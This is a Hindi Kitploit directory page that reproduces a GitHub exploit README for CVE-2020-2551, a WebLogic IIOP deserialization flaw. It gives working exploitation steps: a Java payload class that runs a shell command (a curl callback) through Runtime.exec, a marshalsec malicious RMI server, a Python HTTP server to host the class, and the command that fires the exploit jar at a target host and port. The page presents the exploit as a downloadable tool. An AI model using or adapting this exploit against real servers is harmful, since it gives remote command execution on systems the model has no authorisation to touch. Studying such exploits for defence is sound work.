Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-2551 — Weblogic IIOP CVE-2020-2551 | Kitploit
उपकरण/GitHubGitHub/y4er/cve-2020-2551
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHuby4er/cve-2020-2551

CVE-2020-2551

Weblogic IIOP CVE-2020-2551

रिपॉजिटरी देखें
336786 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-2551

Weblogic IIOP डिसीरियलाइज़ेशन

परीक्षण वातावरण

Weblogic10.3.6+jdk1.6

पैक किया हुआ jar पैकेज एक्सट्रैक्शन कोड: a6ob

भेद्यता शोषण

jar पैकेज डाउनलोड करें, फिर एक दुर्भावनापूर्ण RMI सेवा शुरू करने के लिए marshalsec का उपयोग करें, और स्थानीय रूप से एक exp.java कंपाइल करें।

root@kitploit:~
package payload;

import java.io.IOException;

public class exp {

    public exp() {
        String cmd = "curl http://172.16.1.1/success";
        try {
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

weblogic के समान JDK संस्करण और निर्भरता लाइब्रेरी (wlfullclient.jar) का उपयोग करके कंपाइल करने का प्रयास करें फिर स्थानीय रूप से एक वेब सर्वर शुरू करें।

root@kitploit:~
python -m http.server --bind 0.0.0.0 80

कमांड लाइन से jar पैकेज चलाएँ

root@kitploit:~
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp

वास्तविक प्रभाव चित्र में दिखाया गया है image

ज्ञात समस्याएँ

कई मित्रों का कहना है कि रीप्रोडक्शन सफल नहीं हुआ। कुछ ऑनलाइन लेख पढ़ने के बाद पाया कि IIOP में NAT मोड की समस्या है। आज पता चला कि ज़ियानज़ी पर यह उपलब्ध है: https://xz.aliyun.com/t/7498, आप सभी स्वयं वहाँ जाएँ।

संदर्भ

https://y4er.com/post/weblogic-cve-2020-2551/

टूल डाउनलोड करें